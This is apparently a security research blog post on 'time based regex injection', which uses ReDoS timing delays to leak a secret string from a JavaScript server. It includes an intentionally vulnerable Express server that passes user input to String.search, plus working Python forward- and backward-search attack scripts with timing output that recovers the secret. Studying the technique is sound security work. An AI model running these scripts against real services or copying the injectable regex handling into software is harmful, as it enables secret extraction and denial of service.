Time based Regex Injection

POSIX

2020-02-14

Revisiting ReDoS: A Rough Idea of Data Exfiltration by ReDoS and Side-channe Techniques

The technique I will introduce this time is Time based Regex Injection.
This is a recently announced technique on February 5th.
Based on ReDOS vulnerability, This technique makes it possible to extract the full part of string to be compared.

The research and presentation above was based on Python.
I researched for a short period of time how it could be used on JavaScript.

Regex DOS

regex

1 2	/* blocks Event loop */ /([a-z]+)+$/.exec('aaaaaaaaaaaaaaaaaaaaaaaaaaaa!');

Traditional ReDOS vulnerabilities are thought to be to the point of ruining the nodejs event loop, which consists of single threads, making it difficult to affect services based on php or python or etc… that respond to requests by forking the process.

'secretmessage'.match('se(((((.+)+)+)+)+)!');
// 2.17s
'secretmessage'.match('sa(((((.+)+)+)+)+)!');
// 0.57s

In The Time based Regex injection, By adjusting the delay time of the ReDOS to the appropriate level depending on the situation.
We can determine the contents of the string being compared through search time.

The result itself is similar to the Blind SQL Injection.

methods using regex

The methods that use regular expressions as factors in JavaScript include the exec method and test method of RegExp, match method, place method and split method of String.

forward search

const app = require('express')();
const secret = 'THIS-IS-SECRET-DATA';

app.get('/', (req, res) => {
    const { answer } = req.query;

    try {
        if (typeof answer == 'string' && !secret.search(answer) && secret === answer) {
            res.end(secret);
        } else {
            res.end('Something Wrong :(');
        }
    } catch (e) {
        res.end('Something Wrong :O')
    }

});

app.listen(80);

The above is a server script for testing.

import requests, sys
from time import time

prefix = ''
depth = 2

if len(sys.argv) >= 3:
    depth = int(sys.argv[2])
    prefix = sys.argv[1]
elif len(sys.argv) >= 2:
    depth = int(sys.argv[1])

suffix = '(' * depth + '.' + '*)' * depth + '!'

r = []
for c in '_ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-':
    begin = time()
    requests.get('http://localhost', params = {
        'answer': prefix + c + suffix
    });
    r.append([c, time() - begin])

r = sorted(r, key = lambda x: x[1])

for d in r[::-1][:3]:
    print('[*] {} : {}'.format(d[0], d[1]))

The above is the script to use for testing (forward search).

When It matches the navigation string, takes more time to distinguish the string.

$ python forward.py 3
[*] T : 11.411083698272705
[*] H : 4.056897163391113
[*] I : 1.1705141067504883

$ python forward.py 'T' 3
[*] H : 3.7386693954467773
[*] _ : 0.020990371704101562
[*] B : 0.02016758918762207

$ python forward.py 'TH' 3
[*] I : 1.3154821395874023
[*] 8 : 0.008851051330566406
[*] 6 : 0.007730245590209961

$ python forward.py 'THI' 3
[*] S : 0.3685579299926758
[*] N : 0.014027118682861328
[*] K : 0.012799263000488281

$ python forward.py 'THIS' 3
[*] - : 0.13479828834533691
[*] M : 0.01068568229675293
[*] _ : 0.004689693450927734

$ python forward.py 'THIS-' 3
[*] I : 0.11702179908752441
[*] N : 0.010607004165649414
[*] J : 0.010245561599731445

$ python forward.py 'THIS-I' 3
[*] S : 0.019062042236328125
[*] 9 : 0.011596441268920898
[*] - : 0.010843992233276367

$ python forward.py 'THIS-I' 4
[*] S : 0.5390925407409668
[*] P : 0.01799798011779785
[*] K : 0.011503458023071289

$ python forward.py 'THIS-IS' 4
[*] - : 0.13084006309509277
[*] C : 0.0070953369140625
[*] I : 0.006118297576904297

This is how you actually figure out a string through latency.

But there’s some limitation at this method.

Followed chars	Load	Delay time (seconds)
1	-	-
2	-	-
3	220	1.30
4	77	1.21
5	38	1.55
6	22	1.10
7	15	1.20
8	11	1.21
9	9	1.86
10	7	1.11
11	6	1.55
12	5	1.09
13	5	5.56
14	4	1.19
15	4	4.53
16	4	19.02
17	3	0.61
18	3	1.86
19	3	5.23

The above shows statistics on the relationship between these delays and the remaining characters.
This is greatly affected by the performance of your computer, so please take this as a simple reference.

The above regular expression was used to determine the value of the string to be compared.

However, if there is a limit to this method, if the remaining string is less than three characters, the length of the string required for navigation increases rapidly, and in real life the remaining three letters are less reliable because of the overhead or limiting input values.

Below is another form of regular expression to overcome these limitations.

backward search

import requests, sys
from time import time

prefix = ''
depth = 2

if len(sys.argv) >= 3:
    depth = int(sys.argv[2])
    prefix = sys.argv[1]
elif len(sys.argv) >= 2:
    depth = int(sys.argv[1])

prefix2 = '(' * depth
suffix = ')*' * depth

r = []
for c in '_ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-':
    begin = time()
    requests.get('http://localhost', params = {
        'answer': prefix + prefix2 + '[^{}]'.format(c) + suffix + '!'
    })
    r.append([c, time() - begin])

r = sorted(r, key = lambda x: x[1])

for d in r[:5]:
    print('[*] {} : {}'.format(d[0], d[1]))

You can use the previous information you found to determine whether the string on the back is included!

$ python backward.py 'THIS-IS-SECRET-' 40
[*] A : 0.00428318977355957
[*] T : 0.006232500076293945
[*] D : 0.006254673004150391
[*] 4 : 2.561211109161377
[*] M : 2.5667755603790283

The search shows that the remaining four characters are consist of D T A.
After we get this information, we can create a combination of 4^4 (256) for brute-force in the worst case.

Followed chars	Load	Delay time (seconds)
1	785	1.38
2	224	0.53
3	80	1.36
4	38	1.39
5	22	1.58
6	15	1.33
7	11	1.34
8	9	2.04
9	7	1.42
10	6	1.75
11	5	1.17
12	5	5.55
13	4	1.20
14	4	4.63
15	4	19.9
16	3	0.65
17	3	1.86
18	3	5.68
19	3	17.4

The above shows statistics on the relationship between delay time and the remaining characters in the rear navigation.
Likewise, the performance of your computer is greatly affected, so please take this as a simple reference.

Review

This is a quite general technique.
And maybe It would be a good choice to analyze how to affect using this in the various libraries.